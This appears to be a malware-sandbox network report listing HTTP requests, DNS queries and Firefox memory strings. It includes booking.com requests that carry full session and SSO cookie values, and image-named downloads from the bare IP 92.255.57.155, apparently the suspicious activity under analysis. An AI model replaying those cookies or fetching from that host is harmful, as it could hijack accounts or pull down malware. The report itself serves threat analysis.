Source: global traffic	HTTP traffic detected: GET /uJG23vokgQnONqdB?ae14fd71b07361dc=QqLa1XvNtL3IDPg5hwcH6441n6G3th71NMAKPs37sb-oi88Ezhwben-4ntJlHfu6d-ZKvPmw9Ou-1Q4eIaghjrUJvdnVI4fEULGqEky6ENIRiSv5ZNCNbFV9HiPQFUV_hioiDI56937AWp-BK6pnp4Krr0M&jac=1&je=3432242468646e3f393132266a6e683d3733313d326460303769353134393032303161343a3b6732326738676b306231266266746e3d38323a303032313b32 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /sbFTF64xz1Rd3Car?8f272ba884826d08=DPzpNhvAXadX--KTDza7UqaGJ-f4CdAzeXdSEbPmDw6iCfnEF6pBTvCaNG_CAjAqS6Dyqtps7v1GHzxekFPQa4f7phAyTiPZIgKFkhAPDOdRzuyj1ttqKZyNwXPuIg3kDILwuabmzNORRlTzo_y5moppc54P-AFQT-D2qA1TAv6svTXgyaoHR54QgjbEHMm2ExRmiyoGTW6CDpORMhw&je=3335362470663d247a66743d363b3333332d393d32322e3d39383025333530302e353932332f333732322c373132322d313d30302c353138312f333d30382c3b3138392d333530322e373b37322f313738322c35393b312d313538382e373b3b3925313d32302c363233392f333732322e3739363c2f313530382c3630343825333732382c3d393b3a2d313532302c3730353b2f3337303224353037302531353030243a33333025313d3038246262763f33 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /uJG23vokgQnONqdB?ae14fd71b07361dc=QqLa1XvNtL3IDPg5hwcH6441n6G3th71NMAKPs37sb-oi88Ezhwben-4ntJlHfu6d-ZKvPmw9Ou-1Q4eIaghjrUJvdnVI4fEULGqEky6ENIRiSv5ZNCNbFV9HiPQFUV_hioiDI56937AWp-BK6pnp4Krr0M&jac=1&je=333524247567693f302c34362e3932332e313031 HTTP/1.1Host: asanalytics.booking.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://account.booking.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: esadm=02UmFuZG9tSVYkc2RlIyh9YbxZGyl9Y5%2BPx4LUybj7LiQBYo1cEPFShjHkqgzmD2f3PjR33CXd2fc%3D; dDfPWKZUFKYEYHCSCXHDINGYdeRQYO=1; pcm_consent=analytical%3Dtrue%26countryCode%3DUS%26consentId%3D7c7cd419-8b0d-4ab8-b6bc-80a98f42948e%26consentedAt%3D2025-01-20T13%3A38%3A12.101Z%26expiresAt%3D2025-07-19T13%3A38%3A12.101Z%26implicit%3Dtrue%26marketing%3Dtrue%26regionCode%3DNY%26regulation%3Dnone%26legacyRegulation%3Dnone; bkng_sso_auth=CAIQsOnuTRpmtEespTTisjKtaAKxaA3SgTLH+og+5gbXvWn+dIrRh+S46bEJX4CIUuYETGiCbYP2xP4IBclSgoYWSLJ0mbhrrG4FHo3LYCGkXu8Lq2MI/TK6g1ADgev8CKDQWI2rdW6B5WnY7u9d; bkng_sso_session=e30; bkng_sso_ses=e30; thx_guid=a0a77cb9098a78b22dcc2feaa0311195; tmx_guid=AAxvS1XI7ixUXXSl8BxG4HPgG-VKMVRImMDvg_R10UzewYhb_t4GLfDMUbu4isH-ctNzFtwFuc36yxJ1POTOuWFOn1RS2g; bkng_bfp=874bcd25500f2bce4b65f3a8d14d2e4d; ecid=UvuqzjPX7xG3c587GyFlHAEe; _ga=GA1.2.173713630.1737380307; _gid=GA1.2.2127366867.1737380307
Source: global traffic	HTTP traffic detected: GET /1/34.png HTTP/1.1Host: 92.255.57.155
Source: global traffic	HTTP traffic detected: GET /1/34.png HTTP/1.1Host: 92.255.57.155If-Modified-Since: Fri, 17 Jan 2025 10:42:55 GMTIf-None-Match: "9277b-62be492c56932"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["www.facebook.com","facebook.com"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["www.youtube.com","youtube.com"] equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cfr-doorhanger-feature-notification["www.facebook.com","facebook.com"]resource://gre/modules/AppConstants.sys.mjscfr-doorhanger-milestone-close-button{3923146e-98cb-472b-9c13-f6849d34d6b8}tracking-protection-icon-containercfr-doorhanger-extension-manage-settings-button["www.wikipedia.org","wikipedia.org"]cfr-doorhanger-extension-cancel-button]\|mapToProperty('host'))\|length > 0["www.youtube.com","youtube.com"]cfr-doorhanger-milestone-heading2cfr-doorhanger-milestone-ok-buttonresource://gre/modules/BrowserUtils.sys.mjsresource:///modules/ShellService.sys.mjsresource://nimbus/ExperimentAPI.sys.mjsEnhancer for YouTube"!chrome://global/skin/icons/search-glass.svgcfr-doorhanger-extension-notification2chrome://global/skin/icons/security.svgdefault-browser-notification-messagedefault-browser-notification-buttonresource://gre/modules/XPCOMUtils.sys.mjscfr-doorhanger-extension-sumo-link intersect topFrecentSites[.frecency >= cfr-doorhanger-doh-primary-button-2cfr-doorhanger-doh-secondary-buttonservices.sync.clients.devices.mobilebrowser.startup.upgradeDialog.pinPBM.disabledetp-promotions?as=u&utm_source=inproductchrome://browser/content/cfr-lightning.svgcfr-doorhanger-extension-ok-buttonmr2022-onboarding-existing-pin-checkbox-labelmr2022-onboarding-import-image-altmr2022-onboarding-gratitude-titlemr2022-onboarding-gratitude-primary-button-labelfluent:about-private-browsing-learn-more-linkmr2022-onboarding-mobile-download-subtitlemr2022-onboarding-pin-private-image-altmr2022-onboarding-existing-pin-headermr2022-onboarding-privacy-segmentation-image-altmr2022-onboarding-privacy-segmentation-titlechrome://browser/content/assets/focus-promo.pngfluent:about-private-browsing-focus-promo-ctachrome://browser/content/assets/focus-logo.svgchrome://browser/content/assets/klar-qr-code.svgScan the QR code to get Firefox Klarchrome://browser/content/cfr-lightning-dark.svgmr2022-onboarding-existing-pin-subtitlemr2022-onboarding-set-default-subtitlemr2022-onboarding-set-default-titlemr2022-onboarding-pin-primary-button-labelfx100-thank-you-pin-primary-button-labelfluent:about-private-browsing-focus-promo-text-cmr2022-onboarding-mobile-download-image-altmr2022-onboarding-mobile-download-titlemr2022-onboarding-privacy-segmentation-subtitlemr2022-onboarding-privacy-segmentation-text-ctamr2022-onboarding-default-image-altmr2022-onboarding-secondary-skip-button-labelmr2022-onboarding-mobile-download-cta-textbrowser.dataFeatureRecommendations.enabledmr2022-onboarding-gratitude-image-altmr2022-onboarding-gratitude-subtitlefluent:about-private-browsing-pin-promo-titlebrowser.privateWindowSeparation.enabled!inMr2022Holdback && doesAppNeedPrivatePincookiebanners.service.mode.privateBrowsingtracking-protection-icon-containerbrowser.shell.checkDefaultBrowserfluent:about-private-browsing-pin-promo-headerfeltPrivacyShowPreferencesSectionmr2022-onboarding-no-mobile-download-cta-textmr2022-onboarding-get-started-primary-subtitlebrowser.firefox-view.feature-tour \| regExpMatch('(?<=complet
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cfr-doorhanger-feature-notification["www.facebook.com","facebook.com"]resource://gre/modules/AppConstants.sys.mjscfr-doorhanger-milestone-close-button{3923146e-98cb-472b-9c13-f6849d34d6b8}tracking-protection-icon-containercfr-doorhanger-extension-manage-settings-button["www.wikipedia.org","wikipedia.org"]cfr-doorhanger-extension-cancel-button]\|mapToProperty('host'))\|length > 0["www.youtube.com","youtube.com"]cfr-doorhanger-milestone-heading2cfr-doorhanger-milestone-ok-buttonresource://gre/modules/BrowserUtils.sys.mjsresource:///modules/ShellService.sys.mjsresource://nimbus/ExperimentAPI.sys.mjsEnhancer for YouTube"!chrome://global/skin/icons/search-glass.svgcfr-doorhanger-extension-notification2chrome://global/skin/icons/security.svgdefault-browser-notification-messagedefault-browser-notification-buttonresource://gre/modules/XPCOMUtils.sys.mjscfr-doorhanger-extension-sumo-link intersect topFrecentSites[.frecency >= cfr-doorhanger-doh-primary-button-2cfr-doorhanger-doh-secondary-buttonservices.sync.clients.devices.mobilebrowser.startup.upgradeDialog.pinPBM.disabledetp-promotions?as=u&utm_source=inproductchrome://browser/content/cfr-lightning.svgcfr-doorhanger-extension-ok-buttonmr2022-onboarding-existing-pin-checkbox-labelmr2022-onboarding-import-image-altmr2022-onboarding-gratitude-titlemr2022-onboarding-gratitude-primary-button-labelfluent:about-private-browsing-learn-more-linkmr2022-onboarding-mobile-download-subtitlemr2022-onboarding-pin-private-image-altmr2022-onboarding-existing-pin-headermr2022-onboarding-privacy-segmentation-image-altmr2022-onboarding-privacy-segmentation-titlechrome://browser/content/assets/focus-promo.pngfluent:about-private-browsing-focus-promo-ctachrome://browser/content/assets/focus-logo.svgchrome://browser/content/assets/klar-qr-code.svgScan the QR code to get Firefox Klarchrome://browser/content/cfr-lightning-dark.svgmr2022-onboarding-existing-pin-subtitlemr2022-onboarding-set-default-subtitlemr2022-onboarding-set-default-titlemr2022-onboarding-pin-primary-button-labelfx100-thank-you-pin-primary-button-labelfluent:about-private-browsing-focus-promo-text-cmr2022-onboarding-mobile-download-image-altmr2022-onboarding-mobile-download-titlemr2022-onboarding-privacy-segmentation-subtitlemr2022-onboarding-privacy-segmentation-text-ctamr2022-onboarding-default-image-altmr2022-onboarding-secondary-skip-button-labelmr2022-onboarding-mobile-download-cta-textbrowser.dataFeatureRecommendations.enabledmr2022-onboarding-gratitude-image-altmr2022-onboarding-gratitude-subtitlefluent:about-private-browsing-pin-promo-titlebrowser.privateWindowSeparation.enabled!inMr2022Holdback && doesAppNeedPrivatePincookiebanners.service.mode.privateBrowsingtracking-protection-icon-containerbrowser.shell.checkDefaultBrowserfluent:about-private-browsing-pin-promo-headerfeltPrivacyShowPreferencesSectionmr2022-onboarding-no-mobile-download-cta-textmr2022-onboarding-get-started-primary-subtitlebrowser.firefox-view.feature-tour \| regExpMatch('(?<=complet

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
